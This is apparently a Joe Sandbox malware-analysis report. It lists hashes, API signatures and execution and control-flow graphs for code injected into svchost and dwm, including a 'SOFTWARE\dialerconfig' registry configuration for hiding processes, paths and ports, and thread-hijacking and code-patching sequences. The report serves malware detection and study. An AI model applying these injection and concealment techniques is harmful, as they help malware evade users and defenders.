                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction ID: dfc3c1974cbad934db9993865ec08b5f9e443c71fc6a37ba405ddabd85e8d405
                                                                                                                            • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                            • Instruction Fuzzy Hash: 65113032714F4589EF00CF60E8583E873B4FB59B68F480E25DA6D867A4DF78C1998390
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction ID: a326b1bb8bb403e4a0d4c0446bf3a53fe52e6195dedbf9b24ed740f8b36a4abd
                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction Fuzzy Hash: B171C236304B8185EF359E65D8483FAA7D4FB85784F4A0126DE0B83BA9DF35C6468750
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: 9082f48436bddb50fbe074ea12ed5132107a6f235155bfae31550afec4f2ce97
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: ED613736A00B848AEB20DFA5D4843DDB7A0FB44BC8F184215EF4957FA9DB78D596C720
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction ID: cc360d09ba06bcdff2f15c29ced7a4e175476a6bb9ba5d9fe31b0890df6299d6
                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction Fuzzy Hash: 7851E73230478181FF259A69A55C3FAE7E1FBC6750F8D0125DE4B83B6ECA39C50687A0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction ID: c83ac0f76dcb79476ddf21a95a19c8a865843251dc56904ff8b0029dd694ac40
                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction Fuzzy Hash: E941A232318B8082DF20CF65E8483E9A7A0FB98794F494022EE4EC77A4EB7CC542C750
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                            • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction ID: 558f2c2fa83ee08c27e1fc5abc980bded73aea70065ff57803d74eae209385c4
                                                                                                                            • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                            • Instruction Fuzzy Hash: 0F112832218B8482EF618B15F448399B7E5FB88B94F5D8220EE8D47B69DF3DC552CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                            • API String ID: 592178966-758928094
                                                                                                                            • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction ID: eb669838bcd11bd9391b268dc568cb615196d67751b03d9664e942e19c7f9c9a
                                                                                                                            • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                            • Instruction Fuzzy Hash: F0E08671740B4490DF018F21E8442D873E0EF59B64B8C9122D95C46331FA3CD1FAC310
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __std_exception_copy
                                                                                                                            • String ID: Locator'$riptor at (
                                                                                                                            • API String ID: 592178966-4215709766
                                                                                                                            • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction ID: dcf211704ab779cfcff42d5391f5e7064cd144a077eba1243619bea389c199af
                                                                                                                            • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                            • Instruction Fuzzy Hash: 92E08671740B4480EF028F21D4401D8B3A0FB59B54B8C9122C94C46331EA3CD1E6C310
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 756756679-0
                                                                                                                            • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction ID: f9751e398ec6f9e8c393d2d9c50e353c79f978f663c39b1dde9fddacf25f1213
                                                                                                                            • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                            • Instruction Fuzzy Hash: E2115535705B8881EF059B66A8082AAB3E1FB89FD0F1D40289E4E83776DF78C842C310
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1617791916-0
                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction ID: 58e4b1372e48106c13d9c210e95dfed249a6192135837390fc88e392b1da2cd8
                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                            • Instruction Fuzzy Hash: 52E0393570170886EB058B62D80838AB7E1FB89F26F0A8028890947361DF7DC49AC760

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:1.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:95.2%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:126
                                                                                                                            Total number of Limit Nodes:16
                                                                                                                            execution_graph 15156 1d15b083ab9 15159 1d15b083a06 15156->15159 15157 1d15b083a70 15158 1d15b083a56 VirtualQuery 15158->15157 15158->15159 15159->15157 15159->15158 15160 1d15b083a8a VirtualAlloc 15159->15160 15160->15157 15161 1d15b083abb GetLastError 15160->15161 15161->15159 15162 1d15b081abc 15167 1d15b081628 GetProcessHeap 15162->15167 15164 1d15b081ad2 Sleep SleepEx 15165 1d15b081acb 15164->15165 15165->15164 15166 1d15b081598 StrCmpIW StrCmpW 15165->15166 15166->15165 15168 1d15b081648 _invalid_parameter_noinfo 15167->15168 15212 1d15b081268 GetProcessHeap 15168->15212 15170 1d15b081650 15171 1d15b081268 2 API calls 15170->15171 15172 1d15b081661 15171->15172 15173 1d15b081268 2 API calls 15172->15173 15174 1d15b08166a 15173->15174 15175 1d15b081268 2 API calls 15174->15175 15176 1d15b081673 15175->15176 15177 1d15b08168e RegOpenKeyExW 15176->15177 15178 1d15b0816c0 RegOpenKeyExW 15177->15178 15179 1d15b0818a6 15177->15179 15180 1d15b0816e9 15178->15180 15181 1d15b0816ff RegOpenKeyExW 15178->15181 15179->15165 15223 1d15b0812bc RegQueryInfoKeyW 15180->15223 15183 1d15b08173a RegOpenKeyExW 15181->15183 15184 1d15b081723 15181->15184 15187 1d15b08175e 15183->15187 15188 1d15b081775 RegOpenKeyExW 15183->15188 15216 1d15b08104c RegQueryInfoKeyW 15184->15216 15192 1d15b0812bc 13 API calls 15187->15192 15189 1d15b081799 15188->15189 15190 1d15b0817b0 RegOpenKeyExW 15188->15190 15193 1d15b0812bc 13 API calls 15189->15193 15194 1d15b0817eb RegOpenKeyExW 15190->15194 15195 1d15b0817d4 15190->15195 15196 1d15b08176b RegCloseKey 15192->15196 15197 1d15b0817a6 RegCloseKey 15193->15197 15199 1d15b08180f 15194->15199 15200 1d15b081826 RegOpenKeyExW 15194->15200 15198 1d15b0812bc 13 API calls 15195->15198 15196->15188 15197->15190 15201 1d15b0817e1 RegCloseKey 15198->15201 15202 1d15b08104c 5 API calls 15199->15202 15203 1d15b08184a 15200->15203 15204 1d15b081861 RegOpenKeyExW 15200->15204 15201->15194 15207 1d15b08181c RegCloseKey 15202->15207 15208 1d15b08104c 5 API calls 15203->15208 15205 1d15b08189c RegCloseKey 15204->15205 15206 1d15b081885 15204->15206 15205->15179 15209 1d15b08104c 5 API calls 15206->15209 15207->15200 15210 1d15b081857 RegCloseKey 15208->15210 15211 1d15b081892 RegCloseKey 15209->15211 15210->15204 15211->15205 15234 1d15b096168 15212->15234 15214 1d15b081283 GetProcessHeap 15215 1d15b0812ae _invalid_parameter_noinfo 15214->15215 15215->15170 15217 1d15b0810bf 15216->15217 15218 1d15b0811b5 RegCloseKey 15216->15218 15217->15218 15219 1d15b0810cf RegEnumValueW 15217->15219 15218->15183 15221 1d15b081125 _invalid_parameter_noinfo 15219->15221 15220 1d15b08114e GetProcessHeap 15220->15221 15221->15218 15221->15219 15221->15220 15222 1d15b08116e GetProcessHeap HeapFree 15221->15222 15222->15221 15224 1d15b08148a RegCloseKey 15223->15224 15225 1d15b081327 GetProcessHeap 15223->15225 15224->15181 15231 1d15b08133e _invalid_parameter_noinfo 15225->15231 15226 1d15b081352 RegEnumValueW 15226->15231 15227 1d15b081476 GetProcessHeap HeapFree 15227->15224 15229 1d15b08141e lstrlenW GetProcessHeap 15229->15231 15230 1d15b0813d3 GetProcessHeap 15230->15231 15231->15226 15231->15227 15231->15229 15231->15230 15232 1d15b0813f3 GetProcessHeap HeapFree 15231->15232 15233 1d15b081443 StrCpyW 15231->15233 15236 1d15b08152c 15231->15236 15232->15229 15233->15231 15235 1d15b096177 15234->15235 15235->15235 15237 1d15b08157c 15236->15237 15238 1d15b081546 15236->15238 15237->15231 15238->15237 15239 1d15b08155d StrCmpIW 15238->15239 15240 1d15b081565 StrCmpW 15238->15240 15239->15238 15240->15238 15241 1d15b08554d 15243 1d15b085554 15241->15243 15242 1d15b0855bb 15243->15242 15244 1d15b085637 VirtualProtect 15243->15244 15245 1d15b085671 15244->15245 15246 1d15b085663 GetLastError 15244->15246 15246->15245 15247 1d15b085cf0 15248 1d15b085cfd 15247->15248 15249 1d15b085d09 15248->15249 15256 1d15b085e1a 15248->15256 15250 1d15b085d3e 15249->15250 15251 1d15b085d8d 15249->15251 15252 1d15b085d66 SetThreadContext 15250->15252 15252->15251 15253 1d15b085efe 15255 1d15b085f1e 15253->15255 15269 1d15b0843e0 15253->15269 15254 1d15b085e41 VirtualProtect FlushInstructionCache 15254->15256 15265 1d15b084df0 GetCurrentProcess 15255->15265 15256->15253 15256->15254 15259 1d15b085f23 15260 1d15b085f77 15259->15260 15261 1d15b085f37 ResumeThread 15259->15261 15273 1d15b087940 15260->15273 15262 1d15b085f6b 15261->15262 15262->15259 15264 1d15b085fbf 15268 1d15b084e0c 15265->15268 15266 1d15b084e22 VirtualProtect FlushInstructionCache 15266->15268 15267 1d15b084e53 15267->15259 15268->15266 15268->15267 15271 1d15b0843fc 15269->15271 15270 1d15b08445f 15270->15255 15271->15270 15272 1d15b084412 VirtualFree 15271->15272 15272->15271 15275 1d15b087949 _log10_special 15273->15275 15274 1d15b087954 15274->15264 15275->15274 15278 1d15b088320 15275->15278 15277 1d15b088157 15277->15264 15281 1d15b088331 capture_previous_context 15278->15281 15279 1d15b08833a RtlLookupFunctionEntry 15280 1d15b088389 15279->15280 15279->15281 15280->15277 15281->15279 15281->15280 15282 1d15b05273c 15283 1d15b05276a 15282->15283 15284 1d15b0527c5 VirtualAlloc 15283->15284 15286 1d15b0528d4 15283->15286 15284->15286 15287 1d15b0527ec 15284->15287 15285 1d15b052858 LoadLibraryA 15285->15287 15287->15285 15287->15286 15288 1d15b0828c8 15290 1d15b08290e 15288->15290 15289 1d15b082970 15290->15289 15292 1d15b083844 15290->15292 15293 1d15b083866 15292->15293 15294 1d15b083851 StrCmpNIW 15292->15294 15293->15290 15294->15293

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction ID: 936e08a5784faddd71ec8481daaef1888ccc5e724139e2c30c061473abb367fd
                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction Fuzzy Hash: EE71E736211A10B6EB109FA5F9917D923B4FBCAB88F101212EE4E57B69DF3CC555CB40

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                            • String ID: wr
                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction ID: 4a515bde4b2461a8f5fb9f6f0e449ae6deae7049c49fc889126790a67df4688d
                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction Fuzzy Hash: 53113C36704741A2FF149B91F5047AA72B0F7CAB85F44422AEE8907764EF3DC645CB04

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 59 1d15b085b30-1d15b085b57 60 1d15b085b59-1d15b085b68 59->60 61 1d15b085b6b-1d15b085b76 GetCurrentThreadId 59->61 60->61 62 1d15b085b82-1d15b085b89 61->62 63 1d15b085b78-1d15b085b7d 61->63 65 1d15b085b9b-1d15b085baf 62->65 66 1d15b085b8b-1d15b085b96 call 1d15b085960 62->66 64 1d15b085faf-1d15b085fc6 call 1d15b087940 63->64 67 1d15b085bbe-1d15b085bc4 65->67 66->64 70 1d15b085bca-1d15b085bd3 67->70 71 1d15b085c95-1d15b085cb6 67->71 74 1d15b085c1a-1d15b085c8d call 1d15b084510 call 1d15b0844b0 call 1d15b084470 70->74 75 1d15b085bd5-1d15b085c18 call 1d15b0885c0 70->75 77 1d15b085cbc-1d15b085cdc GetThreadContext 71->77 78 1d15b085e1f-1d15b085e30 call 1d15b0874bf 71->78 88 1d15b085c90 74->88 75->88 81 1d15b085e1a 77->81 82 1d15b085ce2-1d15b085d03 77->82 91 1d15b085e35-1d15b085e3b 78->91 81->78 82->81 90 1d15b085d09-1d15b085d12 82->90 88->67 94 1d15b085d92-1d15b085da3 90->94 95 1d15b085d14-1d15b085d25 90->95 96 1d15b085efe-1d15b085f0e 91->96 97 1d15b085e41-1d15b085e98 VirtualProtect FlushInstructionCache 91->97 105 1d15b085e15 94->105 106 1d15b085da5-1d15b085dc3 94->106 101 1d15b085d8d 95->101 102 1d15b085d27-1d15b085d3c 95->102 99 1d15b085f1e-1d15b085f2a call 1d15b084df0 96->99 100 1d15b085f10-1d15b085f17 96->100 103 1d15b085ec9-1d15b085ef9 call 1d15b0878ac 97->103 104 1d15b085e9a-1d15b085ea4 97->104 120 1d15b085f2f-1d15b085f35 99->120 100->99 108 1d15b085f19 call 1d15b0843e0 100->108 101->105 102->101 110 1d15b085d3e-1d15b085d88 call 1d15b083970 SetThreadContext 102->110 103->91 104->103 111 1d15b085ea6-1d15b085ec1 call 1d15b084390 104->111 106->105 112 1d15b085dc5-1d15b085e10 call 1d15b083900 call 1d15b0874dd 106->112 108->99 110->101 111->103 112->105 124 1d15b085f77-1d15b085f95 120->124 125 1d15b085f37-1d15b085f75 ResumeThread call 1d15b0878ac 120->125 128 1d15b085fa9 124->128 129 1d15b085f97-1d15b085fa6 124->129 125->120 128->64 129->128
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1666949209-0
                                                                                                                            • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                            • Instruction ID: a9ddba6ab40a57e5954b64d7801577c751b21e6e5c29d69ff4d08c1bab641e63
                                                                                                                            • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                            • Instruction Fuzzy Hash: 58D18876204B88A6DA709B46F59039A77B0F7C9B84F500617EA8D47BA9DF7CC641CF40

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 131 1d15b0850d0-1d15b0850fc 132 1d15b08510d-1d15b085116 131->132 133 1d15b0850fe-1d15b085106 131->133 134 1d15b085127-1d15b085130 132->134 135 1d15b085118-1d15b085120 132->135 133->132 136 1d15b085141-1d15b08514a 134->136 137 1d15b085132-1d15b08513a 134->137 135->134 138 1d15b08514c-1d15b085151 136->138 139 1d15b085156-1d15b085161 GetCurrentThreadId 136->139 137->136 140 1d15b0856d3-1d15b0856da 138->140 141 1d15b08516d-1d15b085174 139->141 142 1d15b085163-1d15b085168 139->142 143 1d15b085181-1d15b08518a 141->143 144 1d15b085176-1d15b08517c 141->144 142->140 145 1d15b08518c-1d15b085191 143->145 146 1d15b085196-1d15b0851a2 143->146 144->140 145->140 147 1d15b0851ce-1d15b085225 call 1d15b0856e0 * 2 146->147 148 1d15b0851a4-1d15b0851c9 146->148 153 1d15b08523a-1d15b085243 147->153 154 1d15b085227-1d15b08522e 147->154 148->140 157 1d15b085255-1d15b08525e 153->157 158 1d15b085245-1d15b085252 153->158 155 1d15b085230 154->155 156 1d15b085236 154->156 159 1d15b0852b0-1d15b0852b6 155->159 156->153 160 1d15b0852a6-1d15b0852aa 156->160 161 1d15b085260-1d15b085270 157->161 162 1d15b085273-1d15b085298 call 1d15b087870 157->162 158->157 163 1d15b0852e5-1d15b0852eb 159->163 164 1d15b0852b8-1d15b0852d4 call 1d15b084390 159->164 160->159 161->162 172 1d15b08532d-1d15b085342 call 1d15b083cc0 162->172 173 1d15b08529e 162->173 166 1d15b0852ed-1d15b08530c call 1d15b0878ac 163->166 167 1d15b085315-1d15b085328 163->167 164->163 174 1d15b0852d6-1d15b0852de 164->174 166->167 167->140 178 1d15b085351-1d15b08535a 172->178 179 1d15b085344-1d15b08534c 172->179 173->160 174->163 180 1d15b08536c-1d15b0853ba call 1d15b088c60 178->180 181 1d15b08535c-1d15b085369 178->181 179->160 184 1d15b0853c2-1d15b0853ca 180->184 181->180 185 1d15b0853d0-1d15b0854bb call 1d15b087440 184->185 186 1d15b0854d7-1d15b0854df 184->186 198 1d15b0854bd 185->198 199 1d15b0854bf-1d15b0854ce call 1d15b084060 185->199 187 1d15b0854e1-1d15b0854f4 call 1d15b084590 186->187 188 1d15b085523-1d15b08552b 186->188 200 1d15b0854f6 187->200 201 1d15b0854f8-1d15b085521 187->201 191 1d15b08552d-1d15b085535 188->191 192 1d15b085537-1d15b085546 188->192 191->192 195 1d15b085554-1d15b085561 191->195 196 1d15b08554f 192->196 197 1d15b085548 192->197 203 1d15b085563 195->203 204 1d15b085564-1d15b0855b9 call 1d15b0885c0 195->204 196->195 197->196 198->186 208 1d15b0854d0 199->208 209 1d15b0854d2 199->209 200->188 201->186 203->204 210 1d15b0855bb-1d15b0855c3 204->210 211 1d15b0855c8-1d15b085661 call 1d15b084510 call 1d15b084470 VirtualProtect 204->211 208->186 209->184 216 1d15b085671-1d15b0856d1 211->216 217 1d15b085663-1d15b085668 GetLastError 211->217 216->140 217->216
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                            • Instruction ID: 8c437e6aef1af61c98ea568c04f02af8550e8c557b1cc59ed4192e6d07aa9ea6
                                                                                                                            • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                            • Instruction Fuzzy Hash: BE02A736219B84A6EB608B95F59039AB7B0F3C6794F101116FA8E87BA9DF7CC554CF00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocQuery
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 31662377-0
                                                                                                                            • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                            • Instruction ID: c9029ad0ab38d03f3e4924db51341ba363c4bf8fd9b8a86da5b06627f527b883
                                                                                                                            • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                            • Instruction Fuzzy Hash: F3311232219A84B1EA30DA95F15539E66B4F3CA784F500766F5CE46B98DF7DC7408F04

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1683269324-0
                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction ID: fc1e4ecd937a7a671cec7b3f9f028fd770ee227131cf0e8c00b683bd31e78c7d
                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                            • Instruction Fuzzy Hash: 3F112D71614641B2FB609BE1FB453DA22B4BBD6345F504727B94682591EF7CC2988E10

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3733156554-0
                                                                                                                            • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                            • Instruction ID: a6fec403492fee1e0e4e53f40d37bcee676a3ef256dd91b0934c39ce40200f87
                                                                                                                            • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                            • Instruction Fuzzy Hash: 0DF0B736218B04A0D670DB85F55179AABB0F3C9BE4F545216FA8E47B69CB3CC7908F40

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
